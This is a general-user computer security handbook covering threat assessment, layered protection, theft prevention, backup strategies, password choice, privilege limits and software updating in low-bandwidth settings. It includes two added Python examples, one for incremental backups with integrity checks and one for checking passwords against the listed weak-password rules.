• The creativity of criminals - Humans are creative, and motivated people will always find a way to overcome security barriers and to discover mistakes that lead to security flaws.
• Low user awareness - Ordinary users (the victims of security violations) are naturally unaware of the threats around them and therefore do not look for suitable ways to ensure the security of their data and systems.
• Victims' unrealistic outlook - Some users are aware of security issues but do not take them seriously, because they assume that no attack will be made against them.
[3] Identity Theft
Assessing threats and their costs
To understand the importance of security, a few questions need to be answered. First assume that the following events have happened, then try to assess the likely results of each and, for each one, answer the key questions that follow the list.
What would happen if...
...someone broke into your home or workplace and stole your computer, and also took your backup disk, which might be nearby.
...all the data on your computer were erased.
...a copy of all your data were stolen. This data might include items such as bank account information, a list of usernames and passwords for online shopping[4] websites, important work reports, and coursework worth 50% of your grades for the current term.
...someone watched and memorized, moment by moment, everything you do on your computer: learned your credit card number when you enter it, knew which websites you browse, and could steal your username and password when you connect to a website or to other systems.
...your computer broke down while you were working on an important project in which time is critical.
...a destructive computer virus were sent to all your friends whose names are recorded in your computer's address book.
...you received your telephone bill and found that the amount exceeded even your monthly salary, although you are sure you did not use the telephone that much.
...a credit card statement were sent to you and you saw that the charges are not yours, but the bank tries to convince you that you did use your card that much and has evidence for the claim.
The key questions to answer in each case are as follows:
• If it happens, is recovery possible?
• How much time does the incident take up?
• How much money is spent on it?
• How could it affect your organization?
• What side costs does it carry? (for example, under unfavorable conditions and in the absence of the person responsible)
All of these make clear how important "computer security" is. Now that you have realized that security is a very important matter, the next step is to examine a suitable security plan for becoming secure:
[4] Online Shopping
• What will becoming secure cost you?
• How much time will it take?
• How much of a nuisance will it be?
• Are there things that will become difficult or impossible once the security plan is in place?
• Can you carry out the plan alone, or do you need help from others?
These are very important questions, because to carry out a security plan you need a reasonable estimate of the cost and time required and of the difficulties that come with it. Without such information you may become discouraged along the way, or cancel the project and then find yourself unprotected. Each item is explained further below.
What will becoming secure cost you?
There are several good security measures that need little equipment, and the equipment they do need is not particularly expensive. Even virus scanners[5], the most common security product, are available as freeware[6]. A list of organizations offering free software is given in the appendices.
How much time will it take?
Implementing and following a security plan certainly takes some time, but not a great deal. You need to install suitable software and then carry out the usual protective tasks according to a set routine.
How much of a nuisance will it be for you?
The amount of trouble depends on your point of view. You must be aware of what you are doing and never assume that anything is secure in itself. For example, if someone has sent you an attachment in an e-mail, you must decide whether or not to open it. This degree of caution is needed in everyday life too. For instance, it would be very pleasant to be able to cross the street whenever you wished, but to cross you have to watch the traffic.
Are there things that will become difficult or impossible once the security plan is in place?
Yes; to become secure you must change your behavior to some extent. Choosing a plan for greater security makes you more aware of potential problems, which you should prevent as far as possible. New software packages have many attractive capabilities, but using them, especially those used for extending the network and for sending and receiving messages, increases vulnerability to attack. For example, there may be a website that offers a service you want but that requires you to download a particular piece of software and run it on your computer. If you do not sufficiently trust the people offering the service, it is better to forgo what that program could offer you.
Can you carry out the plan alone, or do you need help from others?
The assumption is that you are responsible for every aspect of your system's security, but in practice it may be better to get help from others so that the job is done better.
• Updating software and applying released patches[7], an important part of the security process, depends on your bandwidth[8]. This is of course no problem for someone whose Internet connection runs at megabyte speeds; but bandwidth in developing countries is severely limited and often costly, and connecting to the Internet by telephone for long periods is not economical either. In such circumstances it is therefore better for one person to update the commonly used software and make the downloaded versions available to others. Unfortunately this is usually harder than having each user download directly;
• Security alerts help people who work with computers professionally. Novice users are usually not very sensitive to such alerts, and a user who does receive one will usually be unable to understand it fully and therefore to respond appropriately.[9] Sometimes you may receive a troublesome spam message claiming to be an update from Microsoft, with an attachment called "Update"; be aware that the attachments to such messages are usually nothing but dangerous viruses; and
• In environments with a large number of computers (workplaces, schools, government offices), someone needs to be employed as system administrator[10] to apply some of the security measures.
If you want to hand system security tasks over to others as well, you must use a suitable plan for working together. More information on administering systems is given in other parts of the book. Note that defining responsibilities within security processes, under groups of one or several people, is an important part of any security plan.
[5] Virus Scanners
[6] Freeware
[7] Patches
[8] Bandwidth
Deciding on a personal security plan
There are many programs that address computers' security needs. Now that you understand the concept of risk and have decided which kinds of risk must be reduced or eliminated, you are able to put a personal security plan into practice. After assessing the costs, the time required and the inconvenience involved, you may conclude that countering some risks is not necessary, at least for now. Your security plan relies on particular software programs, but it must still include processes, rules and personal considerations.
[9] Although this situation is changing as society's security awareness grows.
[10] System Administrator
A good security plan is made up of multiple layers, and each layer removes particular kinds of risk. If you use different layers you will certainly succeed in preventing more problems. Consider driving. What measures do you think could reduce the likelihood of an accident?
Some suitable considerations are listed below:
• If the car needs repair, it must be repaired properly.
• Driving must be done carefully.
• If the manufacturer warns of a defect in the car that affects people's safety, that defect must be fixed promptly.
• Caution is needed when driving, because other cars may cause you trouble.
• If the newspaper warns that a bridge is broken, driving over it must be avoided.
None of the factors above can guarantee your safety on its own, but taking all of them into account reduces the likelihood of an accident considerably. In drawing up the components of a security plan, people should use layers of protection that may even be somewhat redundant. To understand this better, imagine that you want to protect a valuable piece of jewelry. You would certainly put it in a closed box and then in a locked room, and for further assurance you would also insure it against theft. In this example protection is carried out in several stages. Each stage alone raises the level of protection a little, but using all of the stages is certainly wiser, because if one stage fails the others will still help you succeed (for example, if an untrustworthy person is in the house, locking the door is certainly not an adequate measure).
It is worth noting that security techniques may themselves sometimes fail. This may result from design problems, poor implementation or human error. It can be true of tools such as virus scanners, encryption[11] and passwords. Therefore, because any of these tools can fail at any time, you should not rely on a single method.
The user's role in security
The first user of a computer plays an important role in ensuring the safety of the computer and its software. Other users as a whole also play a significant role in making sure that protection and safety procedures are carried out carefully. Note that users who do not know enough about computer security are themselves among the greatest computer security risks.
Security is an art, not a science
In securing computers and networks there is no hundred-percent guarantee, because there will always be new flaws, new ways in, and fresh opportunities for trouble, which themselves stem from human error. But if careful study is done and security best practices[12] are used, the necessary security can be achieved in the system's operation. The websites and mailing lists of computer protection organizations can also be of great help here, because their guidance can be drawn on in unusual circumstances and abnormal situations.
[11] Encryption
[12] Security Best Practices
Chapter Three
Computer and Data Security
Overview
In this chapter we look at ways to secure a computer physically and to prevent the theft of computer data and programs. The main topics of this chapter are physical security, backups, and authentication using a username and password.
Introduction
One of the best ways to understand information security is to use a rule-based approach[13]. Starting with an introduction to physical security in this chapter, in the other chapters of Part Two we will examine other aspects of security and explain the basis for establishing security processes for personal computers and small groups of computers. Information on the technical aspects of security for larger organizations and professional users is given in Part Five. Once the information in this chapter has familiarized you with the general subject, you can build on your technical knowledge with the material in Part Five (IT Security and Technical Administrators).
Physical security
The first step is to make sure that your computer is physically secure. Depending on where you keep your computer and how sensitive the computer and its data are, this step may count as a minor matter or a very important one.
Computer theft
Computer theft is a growing problem. Computers, and laptops in particular, are easily stolen and very hard to find. If the thief does not want the computer for personal use, there are a great many places that buy stolen and second-hand computers. Some thieves do not take the whole computer and its monitor but steal its important parts, such as the memory and the processor. Both have a good market and are easy to carry, and finding them, though not impossible, is very difficult.
Rule One:
Think about the computer before it is stolen.
Having a computer stolen is very distressing and, if you are not insured, imposes a heavy cost on you. In some cases the theft of information exposes business matters or people's confidential secrets, and in worse circumstances the theft of a computer leads to the loss of a job. Nevertheless, if a few simple and inexpensive methods are used, the theft of desktop and laptop computers can be prevented or at least made considerably less likely.
There are two approaches to preventing computer theft: make the computer hard to steal, or reduce the desire to steal it.
Make the computer hard to steal
There are several ways to make a computer harder to steal:
• Make sure the place where the computer is kept is secure. Keep the computer in a lockable room or, if you work alongside other colleagues, place the computer where they can see it. Do not leave your computer unattended in public places such as airports.
• If you think someone might enter the room at night while you are away from your workplace and steal the computer, use an alarm system.
• For security, attach your computer with a wire cable or chain to a rail, pipe or other object that cannot be moved. This method is used in semi-public places such as schools and libraries. Most computers have a dedicated attachment point. Laptops too usually have special cables and locks for this purpose.
• If the computer has a lock that prevents the case[14] from being opened, use it. Special screws that cannot easily be undone can also be used for this purpose.
• If there is valuable information on your computer (such as work data or personal information), then whenever you leave it unattended or are away from it (for example, if you leave the hotel and the computer is in the room), reduce the possibility of logical access[15] to it as far as you can. Logical access means actual use of the computer at a time when physical access to it is possible. Strong passwords and password-protected screen savers are good options for starting this kind of protection (for more information see the discussion of login authorization in this chapter).
• Laptops and PDAs[16] are small and therefore easy to steal. If you do not use them much, be sure to take them out of the workplace.
[13] Rule-Based Approach
Reduce the desire to steal the computer
Very few people are willing to buy a second-hand computer, especially if it is evident that the computer is stolen. The best and cheapest way to make thieves uninterested in stealing a computer is to engrave or paint your details on its case with fixed, permanent markings that cannot be removed. This information can include your name or other details. Take care not to place such markings on the ventilation slots or other openings. Also be aware that marking the case can sometimes void the warranty.
Computers are vulnerable
Computers are sensitive to dust and to uneven surfaces. If a computer is used where there is dust, it must be cleaned regularly and very carefully so that the ventilation slots do not become blocked. Some computers are also sensitive to dips and bumps in the surface on which they stand.
Other aspects of physical security
If you have opened your computer's case to install a piece of hardware, you must heed the warnings given about electrostatic shock (electrostatic shock damages hardware and must be prevented). Note also that, to avoid electric shock, your body must be in constant contact with ground.
To protect your data, make backups[17]
The previous section dealt with physical security. This section describes measures by which you can make sure that data and programs are fully protected. How do you protect the data and programs on your computer?
Data can be lost for several reasons, some of which are listed below:
• accidental deletion of a file;
• theft of the computer;
• accidentally saving one file over another;
• a program malfunctioning in a way that changes or deletes data;
• a malicious program (such as a virus) that changes, overwrites or deletes data;
• a hardware problem (such as problems with the hard disk[18], disk drive, processor or power supply) that causes data to be lost;
• fire, and the use of water to put out the burning computer, which makes the data unrecoverable;
• and so on.
One way of countering these threats is to make backups. A backup is simply a copy of a file or set of files that is kept by transferring it to a floppy disk or compact disc. If the original file is lost or deleted for any reason, the backup can be used to replace it.
Rule Two:
Make backups regularly, and apply protective measures if the computer is exposed to threats.
Backups can be very simple or very complex (one of the simplest kinds is a floppy disk that you keep in your desk drawer). Most backup software packages let you copy the files on your computer to magnetic tape or to a set of CD-ROMs[19]. If your computer is stolen, then by buying a new computer with a configuration similar to the old one and using the backups you will be able to use the lost files again.
Failures, accidents, natural disasters and attacks by intruders cannot be predicted. Usually, despite great efforts to establish security, some problems cannot be prevented, but if you have made proper backups you will at least not lose your data, and in most cases you can restore your system to a stable, lasting state. Even if the data on the computer has been lost completely, with a full set of backups you will be able to restore all the information on a new computer and have access to it again. Of course, this works only if the backups have been stored somewhere other than on the victim computer.
There are various reasons why backups are considered a key component of computer security:
User error
People sometimes delete their files unintentionally. With graphical user interfaces it is possible for a file or directory to be moved accidentally to the wrong place. But if files have been backed up regularly, accidentally deleted files can be recovered. Doing so is also a good precaution against small mistakes.
Hardware failure
The hardware in use can fail at any time and cause data to be lost in the middle of an operation. Damage to a disk can also lead to its complete destruction. But if the files have been backed up, the data can be restored to a new disk drive or system.
Software failure
Most application programs, such as Microsoft Word, Excel and Access, can cause data files to be lost unintentionally. If you have a backup and your application suddenly erases half of the vital information in your working file, you will still be able to recover your data.
[14] Case
[15] Logical Access
[16] Personal Digital Assistants
[17] Backups
[18] Hard Disk
[19] CD-ROMs
Electronic break-ins and vandalism
Attackers and destructive viruses regularly change or delete data. Here too, having backups is a great help to users.
Archival information
Backups serve as archived information that makes it possible to compare current software and data with older software and data. This lets you determine what has been changed, deliberately or accidentally. Likewise, if you want to go back and reconstruct the history of a project, backups are a valuable resource.
Theft
Stealing computers and selling them is very easy. Given this, making backups and storing them outside the computer in a safe place will be a great help, because there have been many cases in which the backups were stolen along with the computer.
Natural disasters
Events such as floods, earthquakes and fires make the importance of protecting the computer even clearer. In this respect, keeping backups at other locations is very useful.
Other disasters
Sometimes a gas leak and the fire that follows it, or liquid spilling onto the ventilation equipment, causes a problem. In these cases too, backups are vital.
Given the effective role that backups can play, it is not surprising that they come in many forms. Note that a backup used for one of the situations above may be of no use in another. Remember that using multi-layered protection and a variety of backup systems to secure yourself against the risks you face at the office or at home is the most effective approach.
Some methods of making backups are given below:
• Copy your sensitive files to a floppy disk, to optical discs, or to high-capacity magnetic disks that can also be erased.
• Copy the contents of the disk to a mirror disk[20] or, if there is enough space, to a directory on the same parent disk. This does not help much with major failures and is useful only if a number of files are deleted unintentionally.
• From time to time create a compressed archive of your important files. The resulting backups can be copied to the same original system or to other computers at different physical locations.
• Back up your files and transfer the backup to another computer over the network or the Internet.
• If you want strong protection against hard disk failure, use two hard disks in your computer together with software or hardware that makes a backup of every file. It should be noted that even with all of this in place, regular backups are still necessary to protect against other problems.
What should be backed up?
There are two views on this:
1. Back up every file that is specific to your computer, other than application programs. This covers data files first of all, but note that you should also back up every file responsible for the compatibility of the operating system and the applications (such as the various settings and configuration files). Working out where these files are kept, and making sure they are sound enough to be restored without trouble later, is very difficult; you can, however, keep all of your data files in a few main directories and arrange your backups so that they cover only the information that is unique to you.
2. Back up everything. With a backup of the whole system you can, depending on how the system is used, restore the entire system when necessary. You can also restore individual files or directories.
We recommend using both approaches together:
1. As soon as the installation of your system is complete, back up all of the computer's files and configuration details, and do so periodically (for example, once every few months).
2. Back up your personal data on a schedule with shorter intervals. Depending on how the data is used, there are several ways of doing this:
• Back up all of your personal data (once every few months), unless it is so large that this is not feasible.
• If you have a large amount of personal data, back up all of it periodically, but at short intervals back up only the files that have changed. This is called an incremental backup. Note that restoring files from this kind of backup requires both the most recent full backup and the most recent incremental backup.
There are other kinds of backup as well. Backup programs usually offer the user suggestions on how to make backups.
Where should backups be kept?
The answer depends on why you are making backups. If the backups are meant to protect data against theft or fire, they should not be stored near the computer system; they should be kept somewhere that is fully protected against those problems. If the backups are only meant for recovering deleted or changed data, the storage place should be chosen so that they are easy to reach.
One solution is to keep full backups in a secure place and incremental backups close at hand. Another is to keep the most recent backup of the data within reach and older copies in more secure places. Some people make two copies of each backup, keeping one within reach and the other far away.
If your computer holds data that thieves want to steal, always remember that they can obtain the same data by stealing a backup. For this reason backups need the same physical protection as the computer itself.
Are the backups usable?
There are several reasons why you may be unable to use your backups when you need them:
• The copy is very old or physically damaged. This problem is seen most often with floppy disks and magnetic media.
• The device that wrote the backup was faulty, so the data written to the backup cannot be read. In such cases it may be possible to read the backup with another, similar device.
• The medium holding the backup has developed a defect. Media defects were so common with floppy disks that nobody was surprised when a disk became unreadable only a few days after it was written. Compact discs had a reputation for being far more durable, but a study in recent years showed that compact discs of poor quality may become unreadable about two years after the data was written to them.
Reading a backup on a device other than the one that wrote it is a good check of the soundness of the medium holding the backup. Note that if you write backups to erasable magnetic disks (such as Zip disks and floppies), you should use new, clean disks.
Some people keep backups for a very long time; but the question is when they will ever use copies of documents, pictures and programs made several years ago. If you intend to keep backups for a long time, you must also allow for the medium becoming obsolete. For example, if data was stored on a five-inch floppy disk of the kind common in 1980, can a computer with a five-inch drive be found today to recover it?
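
The incremental scheme and the read-back check described above, shown as working code: a full backup, an incremental backup that stores only changed files, a restore that needs both, and a check that reads every file back against a recorded hash. This is an added example, not part of the handbook; the manifest file name, the function names and the sample files are assumptions made for illustration.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

MANIFEST = "MANIFEST.sha256"  # assumed name for the hash list kept with each backup


def sha256_of(path):
    """Hash a file in chunks so that large files need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(src):
    """Map every file under src (relative path) to its SHA-256 digest."""
    src = Path(src)
    return {p.relative_to(src).as_posix(): sha256_of(p)
            for p in sorted(src.rglob("*")) if p.is_file()}


def write_backup(src, dest, names, state):
    """Copy the named files to dest and record the state of the whole source."""
    for name in names:
        (Path(dest) / name).parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(Path(src) / name, Path(dest) / name)
    lines = [f"{digest}  {name}\n" for name, digest in sorted(state.items())]
    Path(dest).mkdir(parents=True, exist_ok=True)
    (Path(dest) / MANIFEST).write_text("".join(lines), encoding="utf-8")


def read_manifest(backup):
    text = (Path(backup) / MANIFEST).read_text(encoding="utf-8")
    return {name: digest for digest, name in
            (line.split("  ", 1) for line in text.splitlines())}


def full_backup(src, dest):
    state = snapshot(src)
    write_backup(src, dest, list(state), state)


def incremental_backup(src, dest, full):
    """Store only the files that are new or changed since the full backup."""
    before, now = read_manifest(full), snapshot(src)
    changed = [name for name, digest in now.items() if before.get(name) != digest]
    write_backup(src, dest, changed, now)
    return changed


def intact(path, digest):
    """True if the file can be read back and still matches its recorded hash."""
    try:
        return sha256_of(path) == digest
    except OSError:  # missing file or unreadable medium
        return False


def unreadable(full):
    """Read a full backup back; list the files that are missing or altered."""
    return [n for n, d in read_manifest(full).items() if not intact(Path(full) / n, d)]


def restore(full, incremental, target):
    """Rebuild the latest state; return the names that could not be restored."""
    failed = []
    for name, digest in read_manifest(incremental).items():
        source = Path(incremental) / name
        if not source.is_file():
            source = Path(full) / name  # unchanged since the full backup
        if not intact(source, digest):
            failed.append(name)
            continue
        out = Path(target) / name
        out.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(source, out)
    return failed


def demo():
    """Run the scheme on constructed sample files in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root, data = Path(tmp), Path(tmp) / "data"
        (data / "docs").mkdir(parents=True)
        (data / "docs" / "report.txt").write_text("draft 1")
        (data / "notes.txt").write_text("unchanged")
        full_backup(data, root / "full")
        (data / "docs" / "report.txt").write_text("draft 2")  # changed file
        (data / "new.txt").write_text("added later")  # new file
        changed = incremental_backup(data, root / "incr", root / "full")
        clean = restore(root / "full", root / "incr", root / "out1")
        text = (root / "out1" / "docs" / "report.txt").read_text()
        (root / "full" / "notes.txt").write_text("bit rot")  # simulated media damage
        damaged = restore(root / "full", root / "incr", root / "out2")
        return changed, clean, text, damaged, unreadable(root / "full")
```

The unchanged file exists only in the full backup, so damage to that one copy is enough to make the restore incomplete, which is the case for keeping more than one generation of backups.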
How many backups should be kept?
If you back up what you have once a week, then in a catastrophe you will lose at most one week's information. This is sound from a security point of view, but over time the backups take up more and more space. How many of them should you keep? If you use magnetic disks or compact discs, there is no reason to throw them away quickly, because they take little space and cannot be reused anyway; but you should always keep several copies of your backups. In all of the examples above, the last four copies can be kept.
Why is it better to work this way? Why keep last month's copy when a newer one exists? The reason is simple: the last copy you made may be unreadable, or may be lost or stolen. In that case, although the copies from earlier months are not fully up to date, having them is clearly better than not having them. This is another example of the point that a high level of protection is built from multiple and partly redundant measures.
Back up purchased software
If the licence of the software you have bought allows it, always make a second copy of the software's compact discs and use that copy for installation and support work.
The most important point about backups
The most important point about backups is that they must be made at regular intervals. Some people do not take the trouble to make backups and may suffer the consequences. Even when they do run into a problem, these people generally assume it will not happen again. Our recommendation remains the same: guard against the possible risk and make backups.
Authentication
Authentication lets the computer know who you are, and that knowledge makes it possible to prevent fraud. You are usually identified by a username and a password, although there are other kinds of identification system. The important point is that a password must be made of words that cannot be guessed easily, so that attackers cannot find it. At the same time you must be able to recall it from memory and not forget it. If you deal regularly with computers and websites, you have probably memorized many usernames and passwords by now; but if you have written them on a piece of paper near the computer, you should know that they are not very secure.
User identification
To identify people, most systems ask them to establish their identity in some way. This can be done with different kinds of information: a username, a membership number, the member's name, and so on; in these discussions the term username is generally used. Some systems use an e-mail address instead of a username; in those systems the e-mail address is in effect treated as a particular form of username. The rules for usernames vary:
• Some systems limit the length of the name; others place no limit on it.
• Some systems allow any character that can be typed on the keyboard to be used in a username; others accept only letters and digits and a few symbols.
• Some systems treat upper-case and lower-case letters as the same; others treat them as two different characters.
If the system gives you no choice, your username will be the one the system assigns. If you have to choose the username yourself, what should you take into account? Some points are listed below:
• Do you want the username to show your real identity? Is the name meant to help your friends and colleagues recognize you? An e-mail address is usually regarded as this kind of representation of the user.
• Do you want the name you choose to hide your real identity? If you use this username to take part in a group activity (an Internet game, for example), you may not want others to know who you really are.
• Do you want a name that is easy to remember? If you use an online service only rarely, you may prefer a name that stays in the mind easily. Some people use one username for different services, especially when those services are not connected with anything important or sensitive.
• Do you want the name you use to be hard for others to guess? The username for your bank account should be chosen so that others cannot guess it easily (adequate security calls for layered protection; if you log in to the banking system with your public e-mail address, thieves will find it easier to guess).
Password
In some systems the username is assigned by the system, but the password is always chosen by the user, and it must take a form that is hard for other people to guess.
When passwords are stored on the host system they are usually encrypted, so that someone who gains access to the disk cannot see them. In some cases the encryption is such that the passwords cannot be decrypted; this is called one-way encryption. In these systems, when you enter your password to log in, it is first encrypted and then compared with the copy stored on disk (for more detail, see Appendix 1 of this part).
Rule three:
Use a password that is easy to remember but hard for others to guess.
Because some host systems lack the necessary security, attackers are sometimes able to get at the passwords of all users and obtain the encrypted passwords. Even if one-way encryption is used for every password, an attacker may still be able to discover yours: the algorithms used to encrypt these passwords are well known, so the attacker can use them to encrypt every word in the dictionary and other common passwords. If, for example, you have used the word birthday as your password, the attacker encrypts the word birthday, sees that the encrypted result matches what is on the disk, and from then on knows your password.
Since the whole idea of a password is to let you into the system whenever you wish while making it hard for others to guess, some characteristics of strong passwords can be listed. As with usernames, different systems have different rules for passwords (minimum and maximum length, permitted characters, and so on).
• Never use a single word in your native language as a password. A phrase, a sentence, or pieces of words are more suitable.
• If the system accepts both upper-case and lower-case letters in passwords, use both, but not in their correct and predictable places.
• Where possible, use a mix of digits, permitted symbols and spaces.
• If the system lets you use spaces, or your password is a phrase, you can drop some of the spaces from your password (that is, the password is made of words run together).
• To make your password easy to remember you can use the same password on several systems. If you do, and someone discovers your password on one of those systems, the security of the other systems where you used the same password is also at risk. So choose such a password only for systems that need no special protection. For example, reading newspapers and similar material requires no payment and no confidential information, yet to read the articles on some newspapers' websites you must enter a username and password. In reality they only want you to log in to their system, so you can use the same password for reading different newspapers.
• Some people replace letters with similar-looking symbols or digits: the digit "1" in place of the letters "I" or "L", the number "3" or the symbol "#" in place of the letter "E", the digit "0" in place of the letter "O", the symbol "@" in place of the letter "A", and the digit "5" in place of the letter "S". This is a good trick, but remember that a professional attacker knows these tricks well. They make the attacker's work a little harder, not impossible.
• Replace the letter "I" with "eye" or "aye", or with any meaningful word in your own language. This is especially useful for words such as "icon", which becomes "eyecon" after the change.
• In some systems the password must be longer than a given number of characters, or must contain a given number of letters and digits together. If you are a poor typist and someone watches you and the keyboard over your shoulder, that person will be able to work out your password.
• Never use any of the following as your password:
o a name or anything derived from it;
o your own username or nickname;
o your spouse's name, or the names of your children or parents;
o the names of friends, managers or colleagues;
o the names of pets;
o your own birthday or that of any friend or relative;
o a telephone number, driving licence number or similar document number;
o your favourite colour;
o your position or job title;
o the name of the organization you work for;
o anything else you are known by;
o classic passwords such as "Xyzzy" or "Plover" (passwords used in many computer games), and "open sesame";
o words used in popular and well-known films, news, stories or literature, such as "Harry Potter", "Lord of the Rings" and "Gone with the Wind";
o letters that sit next to each other on the keyboard, such as "SDFGHJ";
o any of the examples above with a digit added before and after;
o letters or digits repeated side by side or in sequence, such as "123456", "aaaa9999" or "ABCDE".
• Spelling words backwards obscures them a little, but does not make them hard to recognize.
• Never store an unencrypted list of passwords in computer files.
• Use acronyms (the first letters of the words that make up a phrase). For example, "tgbwc" is an acronym of the well-known Coca-Cola slogan ("Things Go Better With Coke").
• Whatever your password is, you must memorize it without writing it down. Never write the password down anywhere, and do not leave it at your workplace or on labels.
The best password is a random string of letters and digits, but most of us find such passwords very hard to memorize. It is not at all good for a password to be written in a notebook or under the keyboard. Below are examples of suitable passwords for systems that accept letters, numbers, special symbols and spaces and that distinguish between upper-case and lower-case letters. These passwords are easy to memorize, but very hard to find in dictionaries or to guess.
Password | Description
Computers Are Useful | A statement that many computer users agree with.
Computers aReuseFul | A well-placed space and playful use of capital letters.
C0mputer5@reus#fv1 | The digit "0" in place of the letter "O", "5" in place of "S", "@" in place of "a", "#" in place of "E", "V" in place of "U", and "1" in place of the letter "L"; there is no space in this example.
Comp9uter8sare7usef6ul | The original phrase without spaces, with numbers placed between every 4 letters.
Comutrsa reusful | The original phrase with a few letters left out.
Onupatithwa | In many countries with a storytelling tradition there are standard ways of beginning a story. In English, children's stories usually begin with the phrase Once upon a time, there was. In this example the first two letters of each word are taken, so that the password stays short and at the same time is not recognizable.
oNup@T-1thuua | The previous phrase with the substitutions and symbols described above applied.
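
The rules above can be applied as a self-check that first undoes the disguises the handbook mentions (symbol and digit substitutions, a digit added before or after, backward spelling) and only then compares, which is why those tricks slow a practised attacker only slightly. This is an added example, not part of the handbook; the word lists are small constructed samples and the function names are illustrative.

```python
import itertools
import re

# Constructed sample lists; a real check would load a full word list.
WORDS = {"birthday", "computer", "password", "icon", "dragon"}
CLASSIC = {"xyzzy", "plover", "opensesame", "harrypotter",
           "lordoftherings", "gonewiththewind"}
KEYBOARD_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")
# Substitutions listed in the text; "1" may stand for "i" or "l".
SUBSTITUTIONS = {"1": "il", "3": "e", "#": "e", "0": "o", "@": "a", "5": "s"}


def squash(text):
    """Lower-case the text and drop spaces, so 'Open Sesame' == 'opensesame'."""
    return re.sub(r"\s+", "", text.lower())


def variants(password):
    """Undo the disguises named in the text and return every resulting form."""
    base = squash(password)
    forms = set()
    for text in {base, base.strip("0123456789")}:  # digit added before/after
        if text.count("1") > 8:                    # keep the product small
            text = text.replace("1", "l")
        options = [SUBSTITUTIONS.get(ch, ch) for ch in text]
        forms.update("".join(combo) for combo in itertools.product(*options))
        forms.add(text)
    forms |= {form[::-1] for form in forms}        # words spelled backwards
    forms.discard("")
    return forms


def keyboard_run(text):
    """True for four or more neighbouring keys from one row, in either direction."""
    return len(text) >= 4 and any(text in row or text in row[::-1]
                                  for row in KEYBOARD_ROWS)


def sequence_or_repeat(text):
    """True for runs such as 'abcde' or '123456' and blocks such as 'aaaa9999'."""
    ascending = all(ord(b) - ord(a) == 1 for a, b in zip(text, text[1:]))
    blocks = re.fullmatch(r"(?:(.)\1{2,})+", text) is not None
    return len(text) >= 4 and (ascending or blocks)


def weaknesses(password, personal=()):
    """Return the listed rules that the password breaks; [] means none found."""
    terms = {squash(p) for p in personal if len(squash(p)) >= 3}
    found = set()
    for form in variants(password):
        if form in WORDS:
            found.add("single dictionary word")
        if form in CLASSIC:
            found.add("classic or famous phrase")
        if any(term in form for term in terms):
            found.add("personal detail")
        if keyboard_run(form):
            found.add("keyboard run")
        if sequence_or_repeat(form):
            found.add("sequence or repetition")
    return sorted(found)
```

An empty result only means that none of the listed rules was broken; it is not a measure of strength.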
Limit privileges
Most systems give users limited privileges, fewer than those of the system administrator. When the administrator and the user of a computer are the same person (as on many personal computers), the user does all of his or her work with full access rights (root privileges or administrator privileges), whereas it is better to use a separate username for non-administrative work. This reduces the chance of damaging the system by accident and, if an attacker does break in, considerably reduces the harm done to the system.
Change your password
Passwords should be changed periodically, but how often is still a matter of debate. Some security specialists have recommended changing your password at short intervals; others believe that this leads people to choose simple passwords or to write them down somewhere so as not to forget them. For ordinary use the following is recommended:
• If you think your password has been exposed to theft, change it quickly.
• If you have given your password to someone else for any reason, change it promptly. Sharing passwords is not good practice and should be avoided unless there really is no alternative.
• Change your passwords periodically. "Periodically" means different things to different people; intervals of between 6 months and a year may be appropriate.
• If your organization's policy is more specific on this point, follow it.
Chapter Four
Operating system and application software security
Overview
This chapter examines techniques used to reduce the vulnerability of the operating system and application software to security intrusions.
Introduction
Principle one: Computers run programs.
Principle two: Programs have bugs.
The first principle is obvious, and the second is entirely to be expected, since programmers are not flawless. It is not clear why such a large share of security problems comes from programming errors. Errors such as buffer overflows are easy to prevent while a program is being developed, and yet roughly half of all serious security problems appear to be of this kind.
Commercial software
How does commercial software usually work?
A few years ago, when you bought a piece of software, no updates were applied to it until a new version came onto the market. Today, for various reasons and above all for security reasons, most software is updated regularly. For some software, such as operating systems, "regular updating" means doing so daily [30]. Updates to most products usually cost users nothing.
[30] In October 2003, following a serious security problem in Microsoft Windows, Microsoft concluded that it may be unrealistic and unusual to expect users to install security patches every week; since then it has released patches monthly, except when a problem is very serious and urgent.
Many companies that supply commercial software also supply updates that fix the software's bugs and security vulnerabilities. To obtain updates from the major vendors you can usually go to their website and find the fixes released for their products in the "Support" or "Download" section.
When you visit the software vendor's website you specify the software packages and versions you use, and the website then presents a list of the updates that are available. In some cases it is quite clear that the updates offered apply to your computer; in others it is less clear. Once you have chosen the updates you want, you download them and then install them. Depending on the software, the program you have downloaded may run simply, in a single step, or may need specific instructions to be followed in order to install it. In some cases the update package installs itself almost automatically once it has been downloaded.
In recent years three main methods have generally been used to deliver updates:
1. For programs such as Microsoft Windows, Microsoft publishes update packages through the "Windows Update" website. A program examines your computer and presents a list of the updates the system needs; you can then select, download and install them.
2. Sometimes the update package downloaded in this way is not the actual update but a program that downloads the actual update when it is run. This program may be only 500 kilobytes in size, which is small for a software update package; in fact it is merely a program that downloads the real update and then installs it, and the real update may be around 30 megabytes.
3. Some programs have built-in functions that check for released updates dynamically and, with the user's permission, download and install them.
These facilities are designed to make your work easier. In every case the task of choosing exactly the update packages that are needed (a complicated job for a particular operating system and set of applications) is carried out automatically by programs.
The problem for developing countries
As you can see, many update processes are designed to run in an environment connected to the Internet, and they download update packages of several megabytes. This approach is therefore effective only if you have a high-speed Internet connection or can keep your dial-up connection open for several hours. In developing countries this is usually not possible.
There are two ways of dealing with this problem:
1. Give up on updating your applications and operating system.
2. Ask someone else to download the update package and provide detailed installation instructions. The update package can then be distributed on compact discs or over a local network.
At a time when the likelihood of security threats is increasing, the first option does not seem sensible. The only suitable option is therefore to download patches and fixes and to share the downloaded copies.
There are several ways of doing this:
• If an organization has many machines, the technical administrator should take responsibility for downloading and installing their update packages.
• Computer clubs or other groups can download update packages and make them available to their members.
• Internet service providers (ISPs) can obtain the update packages for common products and widely used operating systems and distribute them locally among their users. This reduces the ISPs' need for international bandwidth and so reduces their costs as well.
• Computer shops can make update packages available to their customers.
• In 2003, when an Internet worm left computers vulnerable, Microsoft countered it by distributing update packages on compact discs in various countries. This method can still be used.
